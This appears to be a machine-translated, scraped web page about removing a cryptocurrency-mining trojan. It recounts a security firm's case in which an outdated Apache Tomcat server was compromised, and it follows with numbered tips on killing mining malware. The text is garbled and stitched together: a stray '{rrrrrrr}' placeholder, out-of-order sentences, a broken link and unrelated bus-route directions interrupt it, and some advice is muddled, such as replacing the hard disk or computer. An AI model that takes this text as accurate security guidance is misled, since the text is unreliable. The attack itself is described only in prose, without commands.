Web Mining vulnerability repair
a new customer recently consulted with sine security company, saying that his server often fails to open the website of the card, and the remote connection to the server is extremely slow. Sometimes the Ping value reaches 300-500, and he often switches. After listening to the customer's words,
will generally judge that he has been attacked by CC + DDoS mixed traffic, It's strange to say that there is no traffic attack on the computer room. It's not a traffic attack, but it also causes the server card and website to fail to open. What kind of attack is this? In order to solve the problem of
client server card, we immediately arranged a security engineer to carry out security detection and deployment on his Linux server
{rrrrrrr}
mining Trojan horse is also designed. If the mining process is forced to stop by customers, it will automatically start to continue mining to achieve uninterrupted mining.
careful inspection shows that it is through setting the hourly task plan, remotely downloading shell mining Trojan horse, and then executing, Check whether the current process exists or not. If not, start the Trojan horse to mine
a detailed security inspection was carried out on the client's Linux server. It was found that fortunately, there was no encrypted server data, and the worm was infected with the disease through the security detection and analysis of our security engineers, we found that the server uses Apache Tomcat environment, the open architecture of the platform is JSP + Oracle database, and Apache Tomcat uses the version of 2016, which leads to the serious remote command execution vulnerability of Apache, Through this vulnerability, the intruder can directly invade the server and get the administrator permission of the server,
virus. If the data was encrypted, the loss would be great. The client was a platform, and the client's data was very important. After finding out the mining Trojan horse,
do customers need to know how the server is attacked? Was the Trojan horse uploaded? It can prevent the attack
in the later stage
sine security engineer immediately repairs the Apache vulnerability and clears the Trojan horse. So far, the problem has been solved, the client server
runs stably, and the network station opens normally
antivirus, if you can't kill it, you can check the program with high CPU or GPU occupation and manually delete it. If you can't, you can't change the hard disk (the disk where the mining program is located)... Change the computer
first of all, if it is a virus written by a rookie, you can find the file path in the task manager, directly terminate the process tree, or directly find the path to delete it<
2 / 6
Second, if the other party's technology is enough, it is difficult for us to terminate the process, then we can download a computer housekeeper. Now the computer housekeeper also increases the scanning rate of mining virus, and if we find it, we can clean it directly
3 / 6
thirdly, if the computer housekeeper can't handle it, then we can check and kill avast. This program is the first in anti-virus, and it's like a sword for mining viruses<
4 / 6
Fourth, if we still suspect that there is a mining virus on the computer after using avast, we first open the process and manually put the document path to the quarantine area
5 / 6
fifthly, after we put it in the isolation area, we use avast's relaxation for analysis, and then send it to avast's staff. If we suspect that it is a mining virus, the other party will give us manual analysis. If it is, the other party will also help us delete it
6 / 6
sixthly, if we still have doubts after being determined in our profession, if it's not Daniel, then my uncle will need to install the computer again. After all, everything is clear
network experience: https://jingyan..com/article/ca41422f1d83601eae99edf3.html
thank you (≥ 8711; ≦)
bus line: Longgang line → Luobao line, the whole journey is about 17.0km
1. Walk about 120m from Yitian village to Yitian station
2. Take Longgang line, pass 2 stops, and reach the shopping Park Station
3. Walk about 180m, then transfer to Luobao line
4. Take Luobao line, pass 10 stops, and reach Taoyuan station
5. Walk about 600m, Arrive at Nanshan culture and Sports Center Theater
Open the task manager with Ctrl + Alt + delete to see if there is any abnormal process. Temporarily use CPU
in addition, you can download and install 360 security guard to open anti mining protection, effectively intercept, and use Trojan horse to check and kill comprehensively
